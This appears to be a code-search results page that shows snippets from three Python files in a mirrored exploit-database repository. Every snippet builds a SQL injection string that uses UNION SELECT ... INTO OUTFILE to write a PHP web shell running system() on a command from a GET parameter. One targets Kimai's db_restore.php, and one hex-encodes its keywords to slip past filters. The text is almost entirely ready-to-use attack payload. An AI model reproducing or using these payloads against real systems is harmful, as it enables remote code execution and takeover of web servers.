Not the results you expected?
25606.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 92 lines
29 sqli = ('http://{0}/kimai/db_restore.php?dates%5B%5D={1}_kimai_var%20UNION'
30 '%20SELECT%20\'<?php%20system($_GET["rr"]);?>\'%20FROM%20kimai_usr'
31 '%20INTO%20OUTFILE%20\'{2}/{3}.php\';--%20&submit=recover')
28960.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 59 lines
36 # ' UNION SELECT '<?php system($_GET['cmd']) ?>,2,3,4,5,6,7,8,9 INTO OUTFILE 'yourshell';-- -
37 exploit = '1\'%20UNION%20SELECT%20\'<?php%20system($_GET[\\\'cmd\\\'])?>\',2,3,4,5,6,7,8,9%20'\
38 'INTO%20OUTFILE%20\'{0}/{1}.php\';%20--%20-%20'.format(options.path,shell)
28971.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 56 lines
28 # ' UNION SELECT '<?php system($_GET['cmd'])?>,2,3,[..]13 INTO OUTFILE 'yourshell';-- -
29 exploit = '\'%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20\'<?php%20system($_GET[\\\'cmd\\\'])?>\''\
30 ',2,3,4,5,6,7,8,9,10,11,12,13%20INTO%20OUTFILE%20\'{0}/{1}.php\';%20--%20-%20'\